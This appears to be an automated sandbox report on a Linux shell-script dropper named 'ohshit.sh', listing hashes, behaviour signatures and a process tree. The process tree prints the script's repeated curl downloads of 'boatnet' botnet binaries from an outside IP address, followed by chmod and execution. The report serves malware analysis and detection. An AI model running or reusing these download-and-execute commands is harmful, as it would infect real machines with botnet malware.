Analysis
-
max time kernel
60s -
max time network
63s -
platform
debian-12_armhf -
resource
debian12-armhf-20240418-en -
resource tags
arch:armhfimage:debian12-armhf-20240418-enkernel:6.1.0-17-armmp-lpaelocale:en-usos:debian-12-armhfsystem -
submitted
31-08-2024 21:05
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
debian12-armhf-20240418-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian12-mipsel-20240729-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
ohshit.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral5
Sample
ohshit.sh
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral6
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral7
Sample
ohshit.sh
Resource
ubuntu2004-amd64-20240729-en
Behavioral task
behavioral8
Sample
ohshit.sh
Resource
ubuntu2204-amd64-20240611-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
fefdf2b7ece4d55bd47778b420f84011
-
SHA1
2823096e0538910f9b57ff9bae007ec655520fc3
-
SHA256
3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb
-
SHA512
b1e1c59a9802ea141e48f395d3f5268c351687e7ca8758feb9b6882d51f230be3c72f657219816c82fa61bd811ce37bfb392c0a26d10d5b53bb333e7af03cf21
Malware Config
Signatures
-
Executes dropped EXE 6 IoCs
ioc pid Process /tmp/WTF 757 WTF /tmp/WTF 771 WTF /tmp/WTF 777 WTF /tmp/WTF 783 WTF /tmp/WTF 788 WTF /tmp/WTF 793 WTF -
resource yara_rule behavioral1/files/fstream-1.dat upx -
Checks CPU configuration 1 TTPs 7 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.i468 curl File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.x86_64 curl File opened for modification /tmp/boatnet.mpsl curl File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/WTF ohshit.sh
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:700 -
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.x862⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:706
-
-
/usr/bin/catcat boatnet.x862⤵PID:755
-
-
/usr/bin/chmodchmod +x boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-timedated.service-qtJorK WTF2⤵PID:756
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:757
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.mips2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:761
-
-
/usr/bin/catcat boatnet.mips2⤵PID:769
-
-
/usr/bin/chmodchmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF2⤵PID:770
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:771
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arc2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:774
-
-
/usr/bin/catcat boatnet.arc2⤵PID:775
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF2⤵PID:776
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:777
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.i4682⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:780
-
-
/usr/bin/catcat boatnet.i4682⤵PID:781
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF2⤵PID:782
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:783
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.i6862⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:785
-
-
/usr/bin/catcat boatnet.i6862⤵PID:786
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF2⤵PID:787
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:788
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.x86_642⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:790
-
-
/usr/bin/catcat boatnet.x86_642⤵PID:791
-
-
/usr/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF2⤵PID:792
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:793
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.mpsl2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:796
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5ba2cb5b8715ba94c39e24e75a34d0ea0
SHA17182bf3b0e14e5224e741c15174c6e93f00df444
SHA25601fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
SHA5120c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d